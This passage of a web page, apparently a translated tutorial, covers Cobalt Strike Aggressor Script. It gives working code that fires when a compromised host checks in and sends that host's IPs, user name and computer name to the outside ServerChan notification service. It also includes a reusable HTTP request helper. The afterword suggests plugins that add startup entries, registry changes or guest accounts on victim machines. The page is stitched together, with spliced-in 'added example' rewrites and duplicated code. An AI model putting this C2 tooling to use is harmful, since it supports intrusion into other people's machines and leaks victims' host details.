    <span class="token variable">$userName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;user&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$computerName</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token comment"># build the Server酱 URL and request it (the values are only space-sanitised, not URL-encoded)</span>
    <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token string">'https://sc.ftqq.com/YOUR_SCKEY.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&amp;desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'</span> <span class="token builtin class-name">.</span> <span class="token variable">$externalIP</span> <span class="token builtin class-name">.</span> <span class="token string">'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'</span> <span class="token builtin class-name">.</span> <span class="token variable">$internalIP</span> <span class="token builtin class-name">.</span> <span class="token string">'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'</span> <span class="token builtin class-name">.</span> <span class="token variable">$userName</span> <span class="token builtin class-name">.</span> <span class="token string">'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'</span> <span class="token builtin class-name">.</span> <span class="token variable">$computerName</span><span class="token punctuation">;</span>

    http_get<span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token punctuation">}</span>
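</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br></div></div><p>The script above concatenates un-encoded Beacon metadata into the query string, opens the connection with no timeout on the thread that handles the event, and silently ignores failures. The following is an added example (not from the original post) of the same notification with those three points addressed: every field goes through <code>java.net.URLEncoder</code>, the request runs in a <code>fork</code> thread with connect/read timeouts, and a non-200 status is reported in the Script Console. It assumes the Server酱 endpoint shape used by the original (<code>https://sc.ftqq.com/&lt;SCKEY&gt;.send?text=...&amp;desp=...</code>); <code>YOUR_SCKEY</code> is a placeholder to replace with your own key.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>
```sleep
# Added example, not from the original post. Same event and Server酱 endpoint,
# but each field is URL-encoded, the request has timeouts and runs off the
# event thread, and failures are reported instead of being swallowed.
$SCKEY = "YOUR_SCKEY";   # placeholder: replace with your own Server酱 key

sub url_encode {
	return [java.net.URLEncoder encode: $1, "UTF-8"];
}

# $1 = SCKEY, $2 = external IP, $3 = internal IP, $4 = user, $5 = computer. Returns the URL.
sub build_notify_url {
	local('$desp');
	$desp = "external ip: " . $2 . "\n\ninternal ip: " . $3 . "\n\nuser: " . $4 . "\n\ncomputer: " . $5;
	return "https://sc.ftqq.com/" . $1 . ".send?text=" . url_encode("CobaltStrike check-in") . "&amp;desp=" . url_encode($desp);
}

# $1 = URL. Returns the HTTP status code, or -1 if the request failed.
sub http_get_status {
	local('$conn $code');
	try {
		$conn = [[new java.net.URL: $1] openConnection];
		[$conn setConnectTimeout: 5000];
		[$conn setReadTimeout: 5000];
		$code = [$conn getResponseCode];
		[$conn disconnect];
		return $code;
	}
	catch $ex {
		println("Server酱 request error: " . $ex);
		return -1;
	}
}

on beacon_initial {
	local('$url');
	$url = build_notify_url($SCKEY, beacon_info($1, "external"), beacon_info($1, "internal"), beacon_info($1, "user"), beacon_info($1, "computer"));

	# fork runs the HTTP round trip in its own thread; the forked scope only sees
	# what is passed in, so hand it the URL and the Beacon ID explicitly
	fork({
		local('$code');
		$code = http_get_status($url);
		if ($code != 200) {
			println("Server酱 notify failed for Beacon " . $bid . " (status " . $code . ")");
		}
	}, $url => $url, $bid => $1);
}
```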

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br></div></div><p>The overall flow: listen for the check-in event, and when a new host checks in, run our code:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># listen for the check-in event</span>

on beacon_initial <span class="token punctuation">{</span>
	<span class="token punctuation">..</span><span class="token punctuation">..</span><span class="token punctuation">..</span> <span class="token comment"># 代码</span>
<span class="token punctuation">}</span>

</code></pre></div><p>Next, define a request function. Sleep variables are global unless declared with <code>local()</code>, so every temporary here is declared local (otherwise the function would overwrite the caller's <code>$url</code>); the handle is closed after reading, and a failed request is reported instead of aborting the event handler:</p> <div class="language-shell"><pre class="language-shell"><code>sub http_get {
    local('$urlobj $stream $handle @content $line $output');  # Sleep variables are global by default
    try {
        $urlobj = [new java.net.URL: $1];                      # $1 is the URL string passed by the caller
        $stream = [$urlobj openStream];                        # plain GET: opens the connection and returns the body stream
        $handle = [SleepUtils getIOHandle: $stream, $null];    # wrap the Java InputStream as a Sleep I/O handle
        @content = readAll($handle);                           # one array element per response line
        closef($handle);                                       # release the socket
        foreach $line (@content) {
            $output .= $line . "\r\n";
        }
        println($output);                                      # response body goes to the Script Console
    }
    catch $message {
        warn("http_get failed: $1 : $message");
    }
}
</code></pre></div><p>Extract the external IP, internal IP, user name and computer name of the host that just checked in, replacing spaces so the values fit in the URL:</p> <div class="language-shell"><pre class="language-shell"><code># get the IPs, computer name and logged-on account; $1 is the beacon id passed to beacon_initial
$externalIP   = replace(beacon_info($1, "external"), " ", "_");
$internalIP   = replace(beacon_info($1, "internal"), " ", "_");
$userName     = replace(beacon_info($1, "user"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");

</code></pre></div><p>Finally, build the URL and send the request. The fixed text in the query is percent-encoded once by hand, but the four beacon fields are appended as they are, with only spaces replaced; a user or computer name containing characters such as &amp;, #, % or non-ASCII text would corrupt the query string or add parameters of its own. These fields come from the compromised host, so treat them as untrusted input and run them through <code>java.net.URLEncoder</code> before concatenating them.</p> <div class="language-shell"><pre class="language-shell"><code># text= decodes to "CobaltStrike 上线提醒" (check-in alert); desp= is a joke line followed by the
# "external ip:", "internal ip:", "user:", "computer:" labels, all percent-encoded by hand
$url = 'https://sc.ftqq.com/YOUR_SERVERCHAN_SCKEY.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&amp;desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:' . $externalIP . '%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:' . $internalIP . '%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:' . $userName . '%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:' . $computerName;

http_get($url);
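</code></pre></div><p>The check-in notifier above, rewritten as an added example (this is not code from the original page): every beacon field is URL-encoded with <code>java.net.URLEncoder</code> before it enters the query, the request goes through <code>HttpURLConnection</code> with connect and read timeouts, and the HTTP status is checked instead of ignored. The endpoint and the SCKEY placeholder follow the page; the helper names <code>urlenc</code>, <code>notify_url</code>, <code>http_get_checked</code> and the <code>$NOTIFY_BASE</code> global are assumptions of this example.</p>

```sleep
# Added example, not part of the original page: a hardened version of the
# notifier above. Beacon fields are URL-encoded before they enter the query,
# the request is sent through HttpURLConnection with timeouts, and the HTTP
# status is checked. Endpoint and SCKEY placeholder follow the page; the helper
# names (urlenc, notify_url, http_get_checked) and $NOTIFY_BASE are my own.

import java.net.URL;
import java.net.URLEncoder;
import java.net.HttpURLConnection;

global('$SCKEY $NOTIFY_BASE');
$SCKEY       = "YOUR_SERVERCHAN_SCKEY";   # placeholder: the key is a credential, keep it out of logs and repos
$NOTIFY_BASE = "https://sc.ftqq.com/";

# percent-encode one value as UTF-8 (spaces become '+', which the server decodes back)
sub urlenc {
    return [URLEncoder encode: $1, "UTF-8"];
}

# Build the notification URL for beacon id $1. Every field passes through urlenc(),
# so a computer name such as "PC&desp=owned" cannot smuggle in a second parameter.
sub notify_url {
    local('$extIP $intIP $user $comp $desp');
    $extIP = beacon_info($1, "external");
    $intIP = beacon_info($1, "internal");
    $user  = beacon_info($1, "user");
    $comp  = beacon_info($1, "computer");
    $desp  = "external ip: " . $extIP . "\n\ninternal ip: " . $intIP . "\n\nuser: " . $user . "\n\ncomputer: " . $comp;
    return $NOTIFY_BASE . $SCKEY . ".send?text=" . urlenc("CobaltStrike check-in") . "&desp=" . urlenc($desp);
}

# GET $1 and return the HTTP status code, or -1 if the request failed.
# Timeouts keep a slow notification service from stalling the client's event thread.
sub http_get_checked {
    local('$con $code $handle @lines');
    try {
        $con = [[new URL: $1] openConnection];
        [$con setRequestMethod: "GET"];
        [$con setConnectTimeout: 5000];
        [$con setReadTimeout: 5000];
        $code = [$con getResponseCode];
        if ($code != 200) {
            warn("notify: unexpected HTTP status $code");
            return $code;
        }
        $handle = [SleepUtils getIOHandle: [$con getInputStream], $null];
        @lines = readAll($handle);          # ServerChan answers with a small JSON body; drain it
        closef($handle);
        return $code;
    }
    catch $e {
        warn("notify: request failed: $e");
        return -1;
    }
}

on beacon_initial {
    # do not print the URL: it contains the SCKEY
    http_get_checked(notify_url($1));
}
```

<p>Aggressor scripts run inside the Cobalt Strike client, so this request leaves from the operator's workstation, not from the team server; load the script through the Script Manager, or run it under the headless <code>agscript</code> client to keep receiving notifications while no GUI client is attached. Whatever service receives the alert also receives the target's host and user names, so choose it with that disclosure in mind.</p>
<div class="language-shell"><pre class="language-shell"><code>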
</code></pre></div><p>That completes a ServerChan check-in notification.</p> <p>Below is a ready-made request helper written by Mariusz B. (mgeeky). Compared with the quick <code>http_get</code> above it uses <code>HttpURLConnection</code>, so it supports request bodies, follows redirects with a depth limit and reports failures instead of throwing:</p> <div class="language-shell"><pre class="language-shell"><code>#
# Safe &amp; sound HTTP request implementation for Cobalt Strike 4.0 Aggressor Script.
# Works with HTTP &amp; HTTPS, GET/POST/etc. + redirections.
#
# Author: Mariusz B. / mgeeky, '20
# &lt;mb [at] binary-offensive.com&gt;
#

import java.net.URLEncoder;
import java.io.BufferedReader;
import java.io.DataOutputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

# User-Agent sent with every request. The excerpt used $USER_AGENT without defining it;
# the value below is a placeholder, set it to whatever fits the engagement.
global('$USER_AGENT');
$USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36";

#
# httpRequest($method, $url, $body);
#
sub httpRequest {
    # everything local, so the helper does not clobber the caller's $url or $body
    local('$method $url $body $n $bodyLen $maxRedirectsAllowed $urlobj $con $outstream $inputstream $handle $responseCode $loc @content $response $line');
    $method = $1;
    $url = $2;
    $body = $3;
    $n = 0;                                   # redirect depth, passed along on recursion

    if(size(@_) == 4) { $n = $4; }

    $bodyLen = strlen($body);
    $maxRedirectsAllowed = 10;
    if ($n &gt; $maxRedirectsAllowed) {
        warn("Exceeded maximum number of redirects: $method $url ");
        return "";
    }

    try
    {
        $urlobj = [new java.net.URL: $url];
        $con = [$urlobj openConnection];
        [$con setRequestMethod: $method];
        [$con setInstanceFollowRedirects: true];
        [$con setRequestProperty: "Accept", "*/*"];
        [$con setRequestProperty: "Cache-Control", "max-age=0"];
        [$con setRequestProperty: "Connection", "keep-alive"];
        [$con setRequestProperty: "User-Agent", $USER_AGENT];

        # getOutputStream() throws unless doOutput is set, so only open it when there is a body to send
        $outstream = $null;
        if($bodyLen &gt; 0) {
            [$con setDoOutput: true];
            [$con setRequestProperty: "Content-Type", "application/x-www-form-urlencoded"];
            $outstream = [$con getOutputStream];
            [$outstream write: [$body getBytes]];
        }

        $responseCode = [$con getResponseCode];

        # follow redirects by hand (HttpURLConnection does not follow across http/https);
        # 304 Not Modified carries no Location and is not a redirect
        if(($responseCode == 301) || ($responseCode == 302) || ($responseCode == 303) || ($responseCode == 307) || ($responseCode == 308)) {
            $loc = [$con getHeaderField: "Location"];
            if ($loc is $null) {
                warn("Redirect without Location header: $method $url ");
                return "";
            }
            return httpRequest($method, $loc, $body, $n + 1);
        }

        $inputstream = [$con getInputStream];
        $handle = [SleepUtils getIOHandle: $inputstream, $outstream];
        @content = readAll($handle);
        closef($handle);
        $response = "";
        foreach $line (@content) {
            $response .= $line . "\r\n";
        }

        # drop the trailing CRLF added by the loop
        if((strlen($response) &gt; 2) &amp;&amp; (right($response, 2) eq "\r\n")) {
            $response = substr($response, 0, strlen($response) - 2);
        }

        return $response;
    }
    catch $message
    {
       warn("HTTP Request failed: $method $url : $message ");
       printAll(getStackTrace());
       return "";
    }
}
</code></pre></div><p>GitHub link: https://github.com/mgeeky/cobalt-arsenal/blob/master/httprequest.cna</p> <h1 id="后记">Afterword</h1> <p>This is where the official scripting documentation ends; what follows there covers custom reports and a few other odds and ends. The core of writing a C2 plugin is the data model and the events: combine different events with the data model to produce different results. For example, having a newly checked-in host add a startup entry, modify the registry or enable the guest account can all be done with a plugin of your own. Since Aggressor Script is built on the Sleep scripting language, it is worth reading the official Sleep documentation carefully. The translated content may contain errors; corrections are welcome.</p> <h2 id="参考文档">References</h2> <p>Official Cobalt Strike scripting documentation: https://www.cobaltstrike.com/help-scripting</p> <p>Sleep language manual: http://sleep.dashnine.org/manual/index.html</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">Last updated:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> </main> <!----></div></div>
  </body>
</html>